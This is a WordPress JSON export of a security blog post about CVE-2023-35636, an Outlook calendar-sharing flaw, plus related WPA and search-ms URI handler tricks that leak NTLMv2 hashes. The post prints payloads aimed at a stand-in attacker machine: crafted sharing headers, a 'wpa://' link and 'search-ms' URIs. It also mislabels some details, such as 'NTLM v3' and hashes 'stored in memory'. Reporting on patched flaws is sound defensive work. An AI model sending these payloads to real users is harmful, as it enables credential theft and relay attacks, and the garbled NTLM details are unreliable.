![\"\"](\"https:\/\/aqqute.wordpress.com\/wp-content\/uploads\/2024\/03\/eadd7-screenshot_20240123_084915_chrome-idorenyin.jpg?w=300&h=175\")
<\/p>\nNew Outlook Flaw Let Attackers Access Hashed Passwords<\/b><\/p>\n
<\/p>\n
A new Outlook vulnerability that can be used to extract NTLMv2 hashes by exploiting Outlook, Windows Performance Analyzer (WPA), and Windows File Explorer has been identified.<\/span><\/p>\n This vulnerability has been assigned with CVE-2023-35636, and the severity has been given as 6.5 (Medium).<\/span><\/p>\n This vulnerability was reported to Microsoft in July 2023, and they took action by patching the WPA and File Explorer with \u201cModerate Severity.\u201d<\/span><\/p>\n Microsoft has completely patched this vulnerability in December 2023. However, unpatched systems are still vulnerable to exploitation and stealing of hashed passwords.<\/span><\/p>\n Outlook Flaw \u2013 CVE-2023-35636<\/span><\/p>\n This vulnerability is an exploit of the calendar-sharing function in Outlook, which, if two additional headers are added, can result in directing Outlook to connect and share content to an external machine. This connectivity can further be utilized for intercepting NTLMv2 hash.<\/span><\/p>\n Suppose an attacker is successful in extracting NTLM v3 hashes. In that case, there are two possible methods of attack, which are Offline brute-force attacks, which can reveal the original password, and authentication relay attacks, in which an authentication request to a server can be manipulated by the attacker with the NTLMv2 hash and get authenticated to the server under the name of the victim.\u00a0<\/span><\/p>\n Leaking of NTLM v2 hashes using Outlook<\/span><\/p>\n Outlook serves as the email and calendar tool for the Microsoft 365 suite, which is used by millions of people and organizations worldwide.<\/span><\/p>\n One of its prime features is the sharing of calendars between users, which can be exploited to trigger an attempt for authentication that can result in redirecting the hashed password to the attacker\u2019s server.<\/span><\/p>\n The headers that can be used for exploitation are,<\/span><\/p>\n \u201cContent-Class\u201d = \u201cSharing\u201d \u2014 tells Outlook that this email contains sharing content.<\/span><\/p>\n \u201cx-sharing-config-url\u201d = \\\\(Attacker machine)\\a.ics \u2014 points the victim\u2019s Outlook to the attacker\u2019s machine.<\/span><\/p>\n Leaking NTLM v2 Hashes using URI Handlers<\/span><\/p>\n Windows Performance Analyzer (WPA), the default feature in Windows, performs an action to install a URI handler for WPA:\/\/ by default, which enables the program to launch automatically when a user clicks on a WPA-related link.\u00a0<\/span><\/p>\n Moreover, this feature uses NTLM v2 hashes for authentication over the open web. This makes it vulnerable to relay and offline brute-force attacks.<\/span><\/p>\n To exploit this WPA, the threat actor can send a payload that will have three parts.\u00a0<\/span><\/p>\n Full payload:<\/span><\/p>\n wpa:\/\/\/\/<attacker IP>\/bla<\/span><\/p>\n wpa:\/\/ \u2014 tells the operating system that this link should open in WPA.<\/span><\/p>\n \/\/<attacker IP> \u2014 tells the victim\u2019s machine to access the attacker\u2019s machine via SMB.<\/span><\/p>\n \/bla \u2014 tells the victim\u2019s machine which file to access.<\/span><\/p>\n Leaking NTLM v2 Hashes using Windows File Explorer<\/span><\/p>\n There is a URI handle \u201csearch-ms\u201d that activates the explorer.exe\u2019s search feature and points the explorer.exe process to the web. This explorer.exe is one of the most powerful processes in the Windows Operating system, which has several capabilities to browse files and folders, copy and move files, and create and delete folders.<\/span><\/p>\n However, as part of the exploitation, there were two parameters identified as part of Microsoft\u2019s documentation: \u201csubquery\u201d and \u201ccrumb\u201d. For exploitation with the \u201csubquery\u201d parameter, the below payload can be used<\/span><\/p>\n search-ms:\/\/query=poc&subquery=\\\\(Attacker machine)\\poc.search-ms<\/span><\/i><\/p>\n search-ms:\/\/ \u2013 tells the operating system that this link should open in exe.<\/span><\/i><\/p>\n query=poc \u2013 Fake search query<\/span><\/i><\/p>\n &subquery=\\\\(Attacker machine)\\poc.search-ms \u2014 Path to .search-ms file.<\/span><\/i><\/p>\n For exploitation with the \u201ccrumb\u201d parameter, the below payload can be used,<\/span><\/i><\/p>\n search-ms:\/\/query=poc&crumb=location:\\\\(Attacker machine)<\/span><\/i><\/p>\n search-ms:\/\/ \u2013 tells the operating system that this link should open in exe.<\/span><\/i><\/p>\n query=poc \u2013 Fake search query<\/span><\/i><\/p>\n crumb=location:\\\\(Attacker machine) <\/span><\/i>\u2014\u00a0<\/span><\/p>\n The location property under the crumb parameter allows the user to specify a path for the search.\u00a0<\/span><\/p>\n Furthermore, a complete report has been published, providing detailed information about the attack scenarios, exploitation methods, etc<\/span><\/p>\n What is NTLMv2?<\/b><\/p>\n NTLMv2 (NT LAN Manager version 2) is a protocol used by Windows operating systems for authentication and authorization purposes. However, NTLMv2 can also be exploited by attackers to gain unauthorized access to a system, steal credentials, and perform other malicious activities.<\/span><\/p>\n Key features of NTLMv2<\/b><\/p>\n Authentication Protocol: NTLMv2 is primarily used for authentication between clients and servers in a Windows network environment. It is commonly employed in scenarios such as user logins and access to shared resources.<\/span><\/p>\n Challenge-Response Mechanism: NTLMv2 uses a challenge-response mechanism for authentication. When a client attempts to access a server, the server sends a random challenge to the client. The client then encrypts this challenge using its password and other information and sends the encrypted response back to the server.<\/span><\/p>\n Hashing and Encryption: NTLMv2 relies on cryptographic techniques for securing authentication data. It uses HMAC-MD5 (Hash-based Message Authentication Code with the MD5 hash function) for integrity checking and DES (Data Encryption Standard) for encryption.<\/span><\/p>\n Enhanced Security: NTLMv2 includes improvements over the original NTLM protocol to enhance security. It addresses weaknesses such as the susceptibility to certain types of attacks, including replay attacks, which were more of a concern in the earlier version.<\/span><\/p>\n Compatibility: NTLMv2 is backward-compatible with the original NTLM protocol, allowing systems to support both versions during a transitional period. However, the use of NTLMv2 is generally recommended for better security.<\/span><\/p>\n Domain Authentication: NTLMv2 is often used in Windows domain environments, where it plays a role in authenticating users and computers within the domain.<\/span><\/p>\n <\/p>\n How to exploit NTLMv2<\/b><\/p>\n One common way to exploit the NTLMv2 vulnerability is through a technique called \u201cpass-the-hash\u201d attack. In this attack, an attacker intercepts the NTLMv2 hash of a user\u2019s password, which is stored in the system\u2019s memory, and uses it to authenticate as the user without knowing their actual password. This allows the attacker to gain access to sensitive resources, such as files and databases, and perform unauthorized actions.<\/span><\/p>\n <\/p>\n Another way to exploit the NTLMv2 vulnerability is through a \u201creplay\u201d attack, in which an attacker intercepts the NTLMv2 authentication messages exchanged between a client and a server and replays them to gain unauthorized access to the system.<\/span><\/p>\n To mitigate the NTLMv2 vulnerability, it is recommended to implement strong password policies, such as enforcing complex passwords and regular password changes. Additionally, using multi-factor authentication and implementing security controls such as firewalls and intrusion detection systems can help prevent and detect attacks exploiting the NTLMv2 vulnerability. Finally, it is important to keep the operating system and other software up-to-date with the latest security patches to minimize the risk of exploitation.<\/span><\/p>\n","protected":false},"excerpt":{"rendered":" New Outlook Flaw Let Attackers Access Hashed Passwords A new Outlook vulnerability that can be used to extract NTLMv2 hashes by exploiting Outlook, Windows Performance Analyzer (WPA), and Windows File Explorer has been identified. This vulnerability has been assigned with CVE-2023-35636, and the severity has been given as 6.5 (Medium). This vulnerability was reported to …<\/p>\n","protected":false},"author":1,"featured_media":1896,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1895","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-business"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/posts\/1895","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/comments?post=1895"}],"version-history":[{"count":0,"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/posts\/1895\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/aqqute.com\/blog\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/media?parent=1895"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/categories?post=1895"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/aqqute.com\/blog\/wp-json\/wp\/v2\/tags?post=1895"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}